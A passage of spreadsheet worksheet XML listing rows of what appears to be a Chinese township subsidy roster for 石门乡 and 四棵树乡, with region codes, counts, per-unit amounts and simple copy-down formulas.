      <c r="J2309" s="24"/>
      <c r="K2309" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2310" customHeight="1" spans="1:14">
      <c r="A2310" s="23" t="s">
        <v>6066</v>
      </c>
      <c r="B2310" s="24" t="str">
        <f>B2309</f>
        <v>石门乡</v>
      </c>
      <c r="C2310" s="24" t="str">
        <f>C2309</f>
        <v>石门乡</v>
      </c>
      <c r="D2310" s="32" t="s">
        <v>6067</v>
      </c>
      <c r="E2310" s="43" t="s">
        <v>6068</v>
      </c>
      <c r="F2310" s="24" t="str">
        <f>F2309</f>
        <v>4113210920</v>
      </c>
      <c r="G2310" s="24"/>
      <c r="H2310" s="24"/>
      <c r="I2310" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2310" s="24"/>
      <c r="K2310" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2311" customHeight="1" spans="1:14">
      <c r="A2311" s="23" t="s">
        <v>6069</v>
      </c>
      <c r="B2311" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2311" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="D2311" s="24" t="s">
        <v>6070</v>
      </c>
      <c r="E2311" s="24" t="s">
        <v>6071</v>
      </c>
      <c r="F2311" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2311" s="24">
        <v>1</v>
      </c>
      <c r="H2311" s="25">
        <v>365</v>
      </c>
      <c r="I2311" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2311" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2311" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2312" customHeight="1" spans="1:14">
      <c r="A2312" s="23" t="s">
        <v>6072</v>
      </c>
      <c r="B2312" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2312" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2312" s="24" t="s">
        <v>6073</v>
      </c>
      <c r="E2312" s="24" t="s">
        <v>6074</v>
      </c>
      <c r="F2312" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2312" s="24">
        <v>1</v>
      </c>
      <c r="H2312" s="25">
        <v>365</v>
      </c>
      <c r="I2312" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2312" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2312" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2313" customHeight="1" spans="1:14">
      <c r="A2313" s="23" t="s">
        <v>6075</v>
      </c>
      <c r="B2313" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2313" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2313" s="24" t="s">
        <v>6076</v>
      </c>
      <c r="E2313" s="24" t="s">
        <v>6077</v>
      </c>
      <c r="F2313" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2313" s="24">
        <v>1</v>
      </c>
      <c r="H2313" s="25">
        <v>365</v>
      </c>
      <c r="I2313" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2313" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2313" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2314" customHeight="1" spans="1:14">
      <c r="A2314" s="23" t="s">
        <v>6078</v>
      </c>
      <c r="B2314" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2314" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2314" s="24" t="s">
        <v>6080</v>
      </c>
      <c r="E2314" s="24" t="s">
        <v>1465</v>
      </c>
      <c r="F2314" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2314" s="24">
        <v>1</v>
      </c>
      <c r="H2314" s="25">
        <v>365</v>
      </c>
      <c r="I2314" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2314" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2314" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2315" customHeight="1" spans="1:14">
      <c r="A2315" s="23" t="s">
        <v>6081</v>
      </c>
      <c r="B2315" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2315" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2315" s="24" t="s">
        <v>6082</v>
      </c>
      <c r="E2315" s="24" t="s">
        <v>6083</v>
      </c>
      <c r="F2315" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2315" s="24">
        <v>2</v>
      </c>
      <c r="H2315" s="25">
        <v>325</v>
      </c>
      <c r="I2315" s="24">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J2315" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2315" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2316" customHeight="1" spans="1:14">
      <c r="A2316" s="23" t="s">
        <v>6084</v>
      </c>
      <c r="B2316" s="24" t="str">
        <f>B2315</f>
        <v>石门乡</v>
      </c>
      <c r="C2316" s="24" t="str">
        <f>C2315</f>
        <v>粮食局</v>
      </c>
      <c r="D2316" s="90" t="s">
        <v>6085</v>
      </c>
      <c r="E2316" s="90" t="s">
        <v>6086</v>
      </c>
      <c r="F2316" s="24" t="str">
        <f>F2315</f>
        <v>4113210920</v>
      </c>
      <c r="G2316" s="24"/>
      <c r="H2316" s="24"/>
      <c r="I2316" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2316" s="24"/>
      <c r="K2316" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2317" customHeight="1" spans="1:14">
      <c r="A2317" s="23" t="s">
        <v>6087</v>
      </c>
      <c r="B2317" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2317" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2317" s="24" t="s">
        <v>6088</v>
      </c>
      <c r="E2317" s="24" t="s">
        <v>6089</v>
      </c>
      <c r="F2317" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2317" s="24">
        <v>1</v>
      </c>
      <c r="H2317" s="25">
        <v>365</v>
      </c>
      <c r="I2317" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2317" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2317" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2318" customHeight="1" spans="1:14">
      <c r="A2318" s="23" t="s">
        <v>6090</v>
      </c>
      <c r="B2318" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2318" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="D2318" s="24" t="s">
        <v>6091</v>
      </c>
      <c r="E2318" s="24" t="s">
        <v>6092</v>
      </c>
      <c r="F2318" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2318" s="24">
        <v>1</v>
      </c>
      <c r="H2318" s="25">
        <v>365</v>
      </c>
      <c r="I2318" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2318" s="24" t="s">
        <v>6093</v>
      </c>
      <c r="K2318" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2319" customHeight="1" spans="1:14">
      <c r="A2319" s="23" t="s">
        <v>6094</v>
      </c>
      <c r="B2319" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2319" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2319" s="24" t="s">
        <v>6095</v>
      </c>
      <c r="E2319" s="24" t="s">
        <v>6096</v>
      </c>
      <c r="F2319" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2319" s="24">
        <v>1</v>
      </c>
      <c r="H2319" s="25">
        <v>365</v>
      </c>
      <c r="I2319" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2319" s="24" t="s">
        <v>6093</v>
      </c>
      <c r="K2319" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2320" customHeight="1" spans="1:14">
      <c r="A2320" s="23" t="s">
        <v>6097</v>
      </c>
      <c r="B2320" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2320" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2320" s="24" t="s">
        <v>6098</v>
      </c>
      <c r="E2320" s="24" t="s">
        <v>3083</v>
      </c>
      <c r="F2320" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2320" s="24">
        <v>1</v>
      </c>
      <c r="H2320" s="25">
        <v>365</v>
      </c>
      <c r="I2320" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2320" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2320" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2321" customHeight="1" spans="1:11">
      <c r="A2321" s="23" t="s">
        <v>6099</v>
      </c>
      <c r="B2321" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2321" s="97" t="s">
        <v>3422</v>
      </c>
      <c r="D2321" s="98" t="s">
        <v>6100</v>
      </c>
      <c r="E2321" s="13" t="s">
        <v>6101</v>
      </c>
      <c r="F2321" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2321" s="24">
        <v>1</v>
      </c>
      <c r="H2321" s="25">
        <v>365</v>
      </c>
      <c r="I2321" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2321" s="99" t="s">
        <v>3080</v>
      </c>
      <c r="K2321" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2322" customHeight="1" spans="1:11">
      <c r="A2322" s="23" t="s">
        <v>6102</v>
      </c>
      <c r="B2322" s="24" t="s">
        <v>6059</v>
      </c>
      <c r="C2322" s="24" t="s">
        <v>6103</v>
      </c>
      <c r="D2322" s="24" t="s">
        <v>6104</v>
      </c>
      <c r="E2322" s="24" t="s">
        <v>6105</v>
      </c>
      <c r="F2322" s="24" t="s">
        <v>6062</v>
      </c>
      <c r="G2322" s="24">
        <v>2</v>
      </c>
      <c r="H2322" s="25">
        <v>325</v>
      </c>
      <c r="I2322" s="24">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J2322" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2322" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2323" customHeight="1" spans="1:11">
      <c r="A2323" s="23" t="s">
        <v>6106</v>
      </c>
      <c r="B2323" s="24" t="str">
        <f>B2322</f>
        <v>石门乡</v>
      </c>
      <c r="C2323" s="24" t="str">
        <f>C2322</f>
        <v>电管所</v>
      </c>
      <c r="D2323" s="90" t="s">
        <v>6107</v>
      </c>
      <c r="E2323" s="90" t="s">
        <v>6108</v>
      </c>
      <c r="F2323" s="24" t="str">
        <f>F2322</f>
        <v>4113210920</v>
      </c>
      <c r="G2323" s="24"/>
      <c r="H2323" s="24"/>
      <c r="I2323" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2323" s="24"/>
      <c r="K2323" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2324" customHeight="1" spans="1:11">
      <c r="A2324" s="23" t="s">
        <v>6109</v>
      </c>
      <c r="B2324" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2324" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2324" s="24" t="s">
        <v>6112</v>
      </c>
      <c r="E2324" s="24" t="s">
        <v>6113</v>
      </c>
      <c r="F2324" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2324" s="24">
        <v>1</v>
      </c>
      <c r="H2324" s="25">
        <v>365</v>
      </c>
      <c r="I2324" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2324" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2324" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2325" customHeight="1" spans="1:11">
      <c r="A2325" s="23" t="s">
        <v>6115</v>
      </c>
      <c r="B2325" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2325" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2325" s="24" t="s">
        <v>6116</v>
      </c>
      <c r="E2325" s="24" t="s">
        <v>6117</v>
      </c>
      <c r="F2325" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2325" s="24">
        <v>1</v>
      </c>
      <c r="H2325" s="25">
        <v>365</v>
      </c>
      <c r="I2325" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2325" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2325" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2326" customHeight="1" spans="1:11">
      <c r="A2326" s="23" t="s">
        <v>6118</v>
      </c>
      <c r="B2326" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2326" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2326" s="24" t="s">
        <v>6119</v>
      </c>
      <c r="E2326" s="24" t="s">
        <v>6120</v>
      </c>
      <c r="F2326" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2326" s="24">
        <v>1</v>
      </c>
      <c r="H2326" s="25">
        <v>365</v>
      </c>
      <c r="I2326" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2326" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2326" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2327" customHeight="1" spans="1:11">
      <c r="A2327" s="23" t="s">
        <v>6121</v>
      </c>
      <c r="B2327" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2327" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2327" s="24" t="s">
        <v>6122</v>
      </c>
      <c r="E2327" s="24" t="s">
        <v>6123</v>
      </c>
      <c r="F2327" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2327" s="24">
        <v>1</v>
      </c>
      <c r="H2327" s="25">
        <v>365</v>
      </c>
      <c r="I2327" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2327" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2327" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2328" customHeight="1" spans="1:11">
      <c r="A2328" s="23" t="s">
        <v>6124</v>
      </c>
      <c r="B2328" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2328" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2328" s="24" t="s">
        <v>6125</v>
      </c>
      <c r="E2328" s="24" t="s">
        <v>6126</v>
      </c>
      <c r="F2328" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2328" s="24">
        <v>3</v>
      </c>
      <c r="H2328" s="25">
        <v>290</v>
      </c>
      <c r="I2328" s="24">
        <f t="shared" si="36"/>
        <v>870</v>
      </c>
      <c r="J2328" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2328" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2329" customHeight="1" spans="1:11">
      <c r="A2329" s="23" t="s">
        <v>6127</v>
      </c>
      <c r="B2329" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2329" s="24" t="str">
        <f>C2328</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2329" s="100" t="s">
        <v>6128</v>
      </c>
      <c r="E2329" s="100" t="s">
        <v>6129</v>
      </c>
      <c r="F2329" s="24" t="str">
        <f>F2328</f>
        <v>4113211125</v>
      </c>
      <c r="G2329" s="24"/>
      <c r="H2329" s="24"/>
      <c r="I2329" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2329" s="24"/>
      <c r="K2329" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2330" customHeight="1" spans="1:11">
      <c r="A2330" s="23" t="s">
        <v>6130</v>
      </c>
      <c r="B2330" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2330" s="24" t="str">
        <f>C2329</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2330" s="62" t="s">
        <v>6131</v>
      </c>
      <c r="E2330" s="62" t="s">
        <v>6132</v>
      </c>
      <c r="F2330" s="24" t="str">
        <f>F2329</f>
        <v>4113211125</v>
      </c>
      <c r="G2330" s="24"/>
      <c r="H2330" s="24"/>
      <c r="I2330" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2330" s="24"/>
      <c r="K2330" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2331" customHeight="1" spans="1:11">
      <c r="A2331" s="23" t="s">
        <v>6133</v>
      </c>
      <c r="B2331" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2331" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2331" s="24" t="s">
        <v>6134</v>
      </c>
      <c r="E2331" s="24" t="s">
        <v>6135</v>
      </c>
      <c r="F2331" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2331" s="24">
        <v>2</v>
      </c>
      <c r="H2331" s="25">
        <v>325</v>
      </c>
      <c r="I2331" s="24">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J2331" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2331" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2332" customHeight="1" spans="1:11">
      <c r="A2332" s="23" t="s">
        <v>6136</v>
      </c>
      <c r="B2332" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2332" s="24" t="str">
        <f>C2331</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2332" s="100" t="s">
        <v>2093</v>
      </c>
      <c r="E2332" s="100" t="s">
        <v>2701</v>
      </c>
      <c r="F2332" s="24" t="str">
        <f>F2331</f>
        <v>4113211125</v>
      </c>
      <c r="G2332" s="24"/>
      <c r="H2332" s="24"/>
      <c r="I2332" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2332" s="24"/>
      <c r="K2332" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2333" customHeight="1" spans="1:11">
      <c r="A2333" s="23" t="s">
        <v>6137</v>
      </c>
      <c r="B2333" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2333" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2333" s="24" t="s">
        <v>6138</v>
      </c>
      <c r="E2333" s="24" t="s">
        <v>6139</v>
      </c>
      <c r="F2333" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2333" s="24">
        <v>1</v>
      </c>
      <c r="H2333" s="25">
        <v>365</v>
      </c>
      <c r="I2333" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2333" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2333" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2334" customHeight="1" spans="1:11">
      <c r="A2334" s="23" t="s">
        <v>6140</v>
      </c>
      <c r="B2334" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2334" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2334" s="24" t="s">
        <v>6141</v>
      </c>
      <c r="E2334" s="24" t="s">
        <v>6142</v>
      </c>
      <c r="F2334" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2334" s="24">
        <v>1</v>
      </c>
      <c r="H2334" s="25">
        <v>365</v>
      </c>
      <c r="I2334" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2334" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2334" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2335" customHeight="1" spans="1:11">
      <c r="A2335" s="23" t="s">
        <v>6143</v>
      </c>
      <c r="B2335" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2335" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2335" s="24" t="s">
        <v>6144</v>
      </c>
      <c r="E2335" s="24" t="s">
        <v>6145</v>
      </c>
      <c r="F2335" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2335" s="24">
        <v>3</v>
      </c>
      <c r="H2335" s="25">
        <v>290</v>
      </c>
      <c r="I2335" s="24">
        <f t="shared" si="36"/>
        <v>870</v>
      </c>
      <c r="J2335" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2335" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2336" customHeight="1" spans="1:11">
      <c r="A2336" s="23" t="s">
        <v>6146</v>
      </c>
      <c r="B2336" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2336" s="24" t="str">
        <f>C2335</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2336" s="100" t="s">
        <v>6147</v>
      </c>
      <c r="E2336" s="100" t="s">
        <v>6148</v>
      </c>
      <c r="F2336" s="24" t="str">
        <f>F2335</f>
        <v>4113211125</v>
      </c>
      <c r="G2336" s="24"/>
      <c r="H2336" s="24"/>
      <c r="I2336" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2336" s="24"/>
      <c r="K2336" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2337" customHeight="1" spans="1:11">
      <c r="A2337" s="23" t="s">
        <v>6149</v>
      </c>
      <c r="B2337" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2337" s="24" t="str">
        <f>C2336</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2337" s="30" t="s">
        <v>6150</v>
      </c>
      <c r="E2337" s="31" t="s">
        <v>6151</v>
      </c>
      <c r="F2337" s="24" t="str">
        <f>F2336</f>
        <v>4113211125</v>
      </c>
      <c r="G2337" s="24"/>
      <c r="H2337" s="24"/>
      <c r="I2337" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2337" s="24"/>
      <c r="K2337" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2338" customHeight="1" spans="1:11">
      <c r="A2338" s="23" t="s">
        <v>6152</v>
      </c>
      <c r="B2338" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2338" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2338" s="24" t="s">
        <v>6153</v>
      </c>
      <c r="E2338" s="24" t="s">
        <v>6154</v>
      </c>
      <c r="F2338" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2338" s="24">
        <v>1</v>
      </c>
      <c r="H2338" s="25">
        <v>365</v>
      </c>
      <c r="I2338" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2338" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2338" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2339" customHeight="1" spans="1:11">
      <c r="A2339" s="23" t="s">
        <v>6155</v>
      </c>
      <c r="B2339" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2339" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2339" s="24" t="s">
        <v>6156</v>
      </c>
      <c r="E2339" s="24" t="s">
        <v>6113</v>
      </c>
      <c r="F2339" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2339" s="24">
        <v>1</v>
      </c>
      <c r="H2339" s="25">
        <v>365</v>
      </c>
      <c r="I2339" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2339" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2339" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2340" customHeight="1" spans="1:11">
      <c r="A2340" s="23" t="s">
        <v>6157</v>
      </c>
      <c r="B2340" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2340" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2340" s="24" t="s">
        <v>6158</v>
      </c>
      <c r="E2340" s="24" t="s">
        <v>6159</v>
      </c>
      <c r="F2340" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2340" s="24">
        <v>2</v>
      </c>
      <c r="H2340" s="25">
        <v>325</v>
      </c>
      <c r="I2340" s="24">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J2340" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2340" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2341" customHeight="1" spans="1:11">
      <c r="A2341" s="23" t="s">
        <v>6160</v>
      </c>
      <c r="B2341" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2341" s="24" t="str">
        <f>C2340</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2341" s="100" t="s">
        <v>6161</v>
      </c>
      <c r="E2341" s="100" t="s">
        <v>1642</v>
      </c>
      <c r="F2341" s="24" t="str">
        <f>F2340</f>
        <v>4113211125</v>
      </c>
      <c r="G2341" s="24"/>
      <c r="H2341" s="24"/>
      <c r="I2341" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2341" s="24"/>
      <c r="K2341" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2342" customHeight="1" spans="1:11">
      <c r="A2342" s="23" t="s">
        <v>6162</v>
      </c>
      <c r="B2342" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2342" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2342" s="24" t="s">
        <v>6163</v>
      </c>
      <c r="E2342" s="24" t="s">
        <v>6164</v>
      </c>
      <c r="F2342" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2342" s="24">
        <v>2</v>
      </c>
      <c r="H2342" s="25">
        <v>325</v>
      </c>
      <c r="I2342" s="24">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J2342" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2342" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2343" customHeight="1" spans="1:11">
      <c r="A2343" s="23" t="s">
        <v>6165</v>
      </c>
      <c r="B2343" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2343" s="24" t="str">
        <f>C2342</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2343" s="100" t="s">
        <v>6166</v>
      </c>
      <c r="E2343" s="100" t="s">
        <v>6167</v>
      </c>
      <c r="F2343" s="24" t="str">
        <f>F2342</f>
        <v>4113211125</v>
      </c>
      <c r="G2343" s="24"/>
      <c r="H2343" s="24"/>
      <c r="I2343" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2343" s="24"/>
      <c r="K2343" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2344" customHeight="1" spans="1:11">
      <c r="A2344" s="23" t="s">
        <v>6168</v>
      </c>
      <c r="B2344" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2344" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2344" s="24" t="s">
        <v>6169</v>
      </c>
      <c r="E2344" s="24" t="s">
        <v>6170</v>
      </c>
      <c r="F2344" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2344" s="24">
        <v>2</v>
      </c>
      <c r="H2344" s="25">
        <v>325</v>
      </c>
      <c r="I2344" s="24">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J2344" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2344" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2345" customHeight="1" spans="1:11">
      <c r="A2345" s="23" t="s">
        <v>6171</v>
      </c>
      <c r="B2345" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2345" s="24" t="str">
        <f>C2344</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2345" s="100" t="s">
        <v>6172</v>
      </c>
      <c r="E2345" s="100" t="s">
        <v>6173</v>
      </c>
      <c r="F2345" s="24" t="str">
        <f>F2344</f>
        <v>4113211125</v>
      </c>
      <c r="G2345" s="24"/>
      <c r="H2345" s="24"/>
      <c r="I2345" s="24">
        <f t="shared" si="36"/>
        <v>0</v>
      </c>
      <c r="J2345" s="24"/>
      <c r="K2345" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2346" customHeight="1" spans="1:11">
      <c r="A2346" s="23" t="s">
        <v>6174</v>
      </c>
      <c r="B2346" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2346" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2346" s="24" t="s">
        <v>6175</v>
      </c>
      <c r="E2346" s="24" t="s">
        <v>6176</v>
      </c>
      <c r="F2346" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2346" s="24">
        <v>1</v>
      </c>
      <c r="H2346" s="25">
        <v>365</v>
      </c>
      <c r="I2346" s="24">
        <f t="shared" si="36"/>
        <v>365</v>
      </c>
      <c r="J2346" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2346" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2347" customHeight="1" spans="1:11">
      <c r="A2347" s="23" t="s">
        <v>6177</v>
      </c>
      <c r="B2347" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2347" s="24" t="s">
        <v>6111</v>
      </c>
      <c r="D2347" s="24" t="s">
        <v>6178</v>
      </c>
      <c r="E2347" s="24" t="s">
        <v>6164</v>
      </c>
      <c r="F2347" s="24" t="s">
        <v>6114</v>
      </c>
      <c r="G2347" s="24">
        <v>2</v>
      </c>
      <c r="H2347" s="25">
        <v>325</v>
      </c>
      <c r="I2347" s="24">
        <f t="shared" si="36"/>
        <v>650</v>
      </c>
      <c r="J2347" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2347" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2348" customHeight="1" spans="1:11">
      <c r="A2348" s="23" t="s">
        <v>6179</v>
      </c>
      <c r="B2348" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2348" s="24" t="str">
        <f>C2347</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2348" s="100" t="s">
        <v>6180</v>
      </c>
      <c r="E2348" s="100" t="s">
        <v>6181</v>
      </c>
      <c r="F2348" s="24" t="str">
        <f>F2347</f>
        <v>4113211125</v>
      </c>
